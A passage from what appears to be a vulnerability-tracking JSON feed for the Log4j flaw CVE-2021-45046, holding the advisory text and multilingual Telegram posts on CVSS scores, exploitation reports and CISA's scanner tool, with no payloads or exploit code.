CVE-2021-45046. It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. 
Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFIRST-EPSS: 0.973630000\nNVD-IS: 6.0\nNVD-ES: 2.2", "creation_timestamp": "2024-04-09T05:20:07.000000Z"}, {"uuid": "8918a833-9bd1-4951-b897-629271d55a1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "Telegram/_URrgi_ugWAyYY1Gb5I-PE6Qg7nO6YbwxbXSuh_zqDNy3g", "content": "", "creation_timestamp": "2023-05-02T08:37:02.000000Z"}, {"uuid": "868baf73-a22f-4c19-8397-fcc5e6ce1a38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/YE_0x/770", "content": "\u0623\u0636\u0627\u0641\u062a \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0648\u0623\u0645\u0646 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0623\u0645\u0631\u064a\u0643\u064a\u0629 (CISA) \u062b\u0644\u0627\u062b\u0629 \u0639\u064a\u0648\u0628 \u0625\u0644\u0649 \u0643\u062a\u0627\u0644\u0648\u062c \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u063a\u0644\u0629 \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 (KEV) \u060c \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u062f\u0644\u064a\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0646\u0634\u0637.\n\nCVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability\nCVE-2023-21839 (CVSS score: 7.5) - Oracle WebLogic Server Unspecified Vulnerability\n\n\ud83d\udea8 ===============\n\ud83d\udd30 #0xYE\n\ud83d\udd30 
#Cyber_Security\n\ud83d\udd30 #Yemeni_Hackers \n\ud83d\udd30 @YE_0x\n\ud83d\udea8===============", "creation_timestamp": "2023-07-06T16:19:06.000000Z"}, {"uuid": "905a698b-af50-4d2b-8201-bdf856499c30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/clonru/107329", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. 
CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. 
\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... \n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @gubernatorskay \u0438 @progekt_kz", "creation_timestamp": "2023-08-11T02:04:26.000000Z"}, {"uuid": "1efe7d8e-24a4-4e6a-be54-3eb4e6de3337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/freelearningtech/609", "content": "Log4j vulnerability CVSS details\nCVE-2021-44228\u00a0(CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)\n\nCVE-2021-45046\u00a0(CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n\nCVE-2021-45105\u00a0(CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n\nCVE-2021-4104\u00a0(CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)\n\n\n\u2764\ufe0f\u2764\ufe0f Enjoy and Share \u2764\ufe0f\u2764\ufe0f\n\nSupport Us \u2764\ufe0f\nChannel : @freelearningtech\nGroup : @freelearningtech21\nWebsite : https://freelearningtech.in/", "creation_timestamp": "2021-12-20T06:50:30.000000Z"}, {"uuid": "73f40d30-5172-4bfd-9ea1-932e969a8b83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": 
"exploited", "source": "https://t.me/true_secator/2450", "content": "\u200b\u200b\u0412\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f Log4Shell \u043a\u0438\u0431\u0435\u0440\u043f\u0430\u043d\u0434\u0435\u043c\u0438\u044f \u0432 \u0441\u0444\u0435\u0440\u0435 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u043e\u0440\u043e\u0442\u044b.\n \n\u041d\u0430\u0440\u044f\u0434\u0443 \u0441 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0431\u043e\u043b\u0435\u0435 1,8 \u043c\u043b\u043d. \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 \u0432 Log4j, \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432\u0442\u043e\u0440\u0443\u044e \u0438 \u0442\u0440\u0435\u0442\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n \n\u042d\u0442\u043e \u0432\u0441\u0435 \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 60 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u0431\u0430\u0433\u0443 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432 malware, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0432\u0435\u0441\u044c \u0441\u043f\u0435\u043a\u0442\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0432\u043e\u0437\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439 \u043e\u0442 \u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0442\u0440\u043e\u044f\u043d\u043e\u0432 
\u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0434\u043e \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432 \u0438 \u0432\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u0435\u043a. \u0418, \u0447\u0442\u043e \u0435\u0449\u0435 \u0445\u0443\u0436\u0435, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c MSTIC, \u0431\u0440\u043e\u043a\u0435\u0440\u044b \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u0434\u043b\u044f \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0435 \u0441\u0435\u0442\u0438, \u043b\u0430\u0437\u0435\u0439\u043a\u0438 \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u0431\u044b\u043b\u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f\u043c.\n \n\u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0410\u0420\u0422, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u041a\u0438\u0442\u0430\u0435\u043c (Hafnium), \u0418\u0440\u0430\u043d\u043e\u043c (APT 35 aka Phosphorus), \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0439 \u0438 \u0422\u0443\u0440\u0446\u0438\u0435\u0439, \u0432 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432 \u043c\u043e\u043c\u0435\u043d\u0442\u0435 
\u0441\u0438\u0441\u0442\u0435\u043c, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u043e\u0442 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445.\n \n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c Cloudflare \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432\u0447\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0435\u0440\u0435\u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0430 \u0432\u0442\u043e\u0440\u0443\u044e CVE, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0443\u044e \u0432 \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 Log4j.\n \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-45046  \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Log4j \u043e\u0442 2.0-beta9 \u0434\u043e 2.12.1 \u0438 \u043e\u0442 2.13.0 \u0434\u043e 2.15.0 \u0438 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0438\u0437-\u0437\u0430 \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Apache Software Foundation \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 CVE \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 
\u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445, \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0445 \u043e\u0442 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u041d\u0435\u043f\u043e\u043b\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f CVE-2021-44228 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043f\u043e\u0438\u0441\u043a\u0430 JNDI, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0430\u0442\u0430\u043a\u0435 \u0442\u0438\u043f\u0430 \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (DoS). 
\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0435\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0444\u0438\u043a\u0441\u0438\u043b\u0438 \u0432 Log4j \u0432\u0435\u0440\u0441\u0438\u0438 2.16.0.\n \n\u0415\u0449\u0435 \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0442\u0440\u0435\u0432\u043e\u0433\u0443 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Praetorian, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u0442\u0440\u0435\u0442\u044c\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Log4j \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043a\u0440\u0430\u0436\u0438 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445. 
\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0430\u044e\u0442\u0441\u044f, \u0434\u0430\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u043a\u043e\u043b\u043b\u0430\u043f\u0441, \u0438, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0435\u0449\u0435 \u0438 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f 2.16.0, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439.\n \n\u041c\u043e\u0436\u0435\u0442\u0435 \u0441\u0430\u043c\u0438 \u043e\u0446\u0435\u043d\u0438\u0442\u044c, \u043a\u0430\u043a \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 Log4j 2.15.0.", "creation_timestamp": "2021-12-16T12:58:15.000000Z"}, {"uuid": "2c94859c-ea24-498f-93d5-c42cb008f3ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/CyberSecurityIL/8227", "content": "\u05d4\u05e1\u05d5\u05db\u05e0\u05d5\u05ea \u05dc\u05d4\u05d2\u05e0\u05ea \u05e1\u05d9\u05d9\u05d1\u05e8 \u05d5\u05ea\u05e9\u05ea\u05d9\u05d5\u05ea \u05d1\u05d0\u05e8\u05d4\"\u05d1 (CISA) \u05de\u05e4\u05e8\u05e1\u05de\u05ea \u05db\u05dc\u05d9 \u05dc\u05e1\u05e8\u05d9\u05e7\u05ea 
\u05e9\u05e8\u05ea\u05d9\u05dd \u05d4\u05e4\u05d2\u05d9\u05e2\u05d9\u05dd \u05dc\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05e9\u05d6\u05d5\u05d4\u05d5 \u05d1\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea Log4j.\n\n\u05d4\u05db\u05dc\u05d9 \u05e9\u05e4\u05d5\u05e8\u05e1\u05dd \u05d9\u05d9\u05d3\u05e2 \u05dc\u05d6\u05d4\u05d5\u05ea \u05e9\u05e8\u05ea\u05d9\u05dd \u05d4\u05d7\u05e9\u05d5\u05e4\u05d9\u05dd \u05dc\u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea CVE-2021-44228 \u05d5-CVE-2021-45046 \u05d4\u05e7\u05d9\u05d9\u05de\u05d9\u05dd \u05d1\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea Log4j. \n\u05dc\u05db\u05dc\u05d9 \u05e9\u05e4\u05d5\u05e8\u05e1\u05dd \u05d9\u05e9 \u05de\u05e1\u05e4\u05e8 \u05d9\u05db\u05d5\u05dc\u05d5\u05ea \u05db\u05d2\u05d5\u05df: \n\n- \u05e1\u05e8\u05d9\u05e7\u05d4 \u05dc\u05e4\u05d9 URL\n- \u05e1\u05e8\u05d9\u05e7\u05d4 \u05e9\u05dc \u05dc\u05de\u05e2\u05dc\u05d4 \u05de-60 Header-\u05d9\u05dd \u05e9\u05d5\u05e0\u05d9\u05dd \u05d1\u05d4\u05dd \u05e0\u05d9\u05ea\u05df \u05dc\u05e9\u05ea\u05d5\u05dc \u05e1\u05e7\u05e8\u05d9\u05e4\u05d8 \u05d6\u05d3\u05d5\u05e0\u05d9. 
\n- \u05d6\u05d9\u05d4\u05d5\u05d9 \u05e9\u05dc \u05ea\u05e2\u05d1\u05d5\u05e8\u05d4 \u05d7\u05e9\u05d5\u05d3\u05d4 \u05e2\u05dc \u05d2\u05d1\u05d9 \u05e4\u05e8\u05d5\u05d8\u05d5\u05e7\u05d5\u05dc dns \u05d5\u05e2\u05d5\u05d3.\n\n\u05d0\u05dd \u05e2\u05d3 \u05e2\u05db\u05e9\u05d9\u05d5 \u05d7\u05dc\u05e7\u05db\u05dd \u05d4\u05e2\u05d3\u05e4\u05ea\u05dd \u05dc\u05d0 \u05dc\u05e2\u05e9\u05d5\u05ea \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1\u05db\u05dc\u05d9\u05dd \u05d3\u05d5\u05de\u05d9\u05dd \u05d4\u05de\u05ea\u05e4\u05e8\u05e1\u05de\u05d9\u05dd \u05e2\"\u05d9 \u05d9\u05d7\u05d9\u05d3\u05d9\u05dd \u05d5\u05d7\u05d1\u05e8\u05d5\u05ea \u05e4\u05e8\u05d8\u05d9\u05d5\u05ea, \u05db\u05e2\u05ea \u05e0\u05d9\u05ea\u05df \u05dc\u05d4\u05d5\u05e8\u05d9\u05d3 \u05d0\u05ea \u05d4\u05db\u05dc\u05d9 \u05e9\u05de\u05e4\u05d5\u05e8\u05e1\u05dd \u05e2\"\u05d9 CISA \u05db\u05e7\u05d5\u05d3 \u05e4\u05ea\u05d5\u05d7 \u05de\u05de\u05e9 \u05db\u05d0\u05df \ud83d\udc47\ud83c\udffb \n\nhttps://github.com/cisagov/log4j-scanner\n\nhttps://t.me/joinchat/VRKwnb9-k8CSIizf", "creation_timestamp": "2021-12-22T17:11:25.000000Z"}, {"uuid": "ba27657a-a938-4849-8082-02a6e5ee23f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/hacker_trick/555", "content": "\u062b\u063a\u0631\u0629 Log4Shell \n\u0627\u0644\u0623\u0633\u0628\u0648\u0639 \u0627\u0644\u0645\u0627\u0636\u064a \u062a\u0645 \u0637\u0631\u062d\u00a0\u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 \u0623\u062f\u0627\u0629 \u0627\u0644\u062a\u0633\u062c\u064a\u0644 Log4j \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u062b\u063a\u0631\u0629\u00a0CVE-2021-44228 \u062d\u064a\u062b \u062a\u0645 \u0625\u0644\u063a\u0627\u0621 \u0627\u062a\u0627\u062d\u0629 \u062c\u0627\u0646\u0628 \u0648\u0627\u062d\u062f \u0641\u0642\u0637 \u0645\u0646 \u0648\u0638\u0627\u0626\u0641 
\u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a JNDI \u062b\u0645 \u062a\u0628\u064a\u0646 \u0623\u0646\u0647 \u0644\u0627 \u064a\u0632\u0627\u0644 \u0645\u0646 \u0627\u0644\u0645\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u0648\u0644\u0643\u0646 \u062a\u0645 \u062d\u062c\u0628 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629 \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u0644\u062e\u0637\u0623 \u0644\u0645\u0646\u0639 \u0627\u0644\u0645\u0632\u064a\u062f \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n_ \u0623\u0642\u0631\u062a \u0634\u0631\u0643\u0629 Apache \u0628\u0627\u0644\u062e\u0637\u0623 \u0645\u0631\u0629 \u0623\u062e\u0631\u0649 \u0648\u0644\u0630\u0644\u0643 \u0642\u0627\u0645\u062a \u0628\u062a\u0639\u0637\u064a\u0644 \u0643\u0627\u0641\u0629 \u062f\u0639\u0645 JNDI \u0628\u0634\u0643\u0644 